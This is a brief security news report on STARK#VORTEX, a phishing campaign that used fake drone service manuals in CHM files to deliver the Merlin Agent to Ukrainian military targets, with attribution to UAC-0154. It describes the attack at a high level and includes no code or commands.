Ukrainian military institutions have come under attack in a sophisticated phishing campaign that exploits their reliance on drones. This campaign, known as STARK#VORTEX, employs a deceptive tactic by disguising malware within files masquerading as UAV service manuals, a resource integral to Ukrainian military operations. The attackers utilize a Microsoft Compiled HTML Help (CHM) file as the entry point, which, when opened, initiates a sequence of actions culminating in the deployment of the Merlin Agent. This tool enables the attackers to establish control over the compromised system, potentially leading to serious security breaches.
Intricate Evasion Techniques: While the attack's surface may seem uncomplicated, the perpetrators have implemented complex Tactics, Techniques, and Procedures (TTPs) along with obfuscation methods to evade detection. One of the notable aspects of this campaign is the deliberate use of misleading lure documents that appear as legitimate help-themed files, making it more challenging for potential victims to identify the threat.
First Appearance of Merlin: This marks the debut of the Merlin toolkit in attacks targeting Ukrainian government organizations. It was previously identified by Ukraine's Computer Emergency Response Team (CERT-UA) in an unrelated attack earlier in the year. The toolkit's deployment in this latest campaign demonstrates a heightened level of sophistication in cyber threats faced by Ukrainian military entities.
Attribution to UAC-0154: The Ukrainian CERT attributes these intrusions to a threat actor it tracks under the codename UAC-0154. The files and documents utilized in the attack chain possess a high degree of efficacy in bypassing conventional security measures, contributing to the campaign's success.
Continued Threat Landscape: This incident comes on the heels of CERT-UA's recent announcement regarding an attempted cyber attack on a critical energy infrastructure facility within Ukraine. This assault was attributed to the Russian state-sponsored group APT28, indicating a persisting threat landscape in the region.
The utilization of drone manuals as bait in this phishing campaign underscores the evolving tactics of threat actors. Ukrainian military institutions, like many others globally, must remain vigilant and enhance their cybersecurity measures to effectively counter these increasingly sophisticated cyber threats.
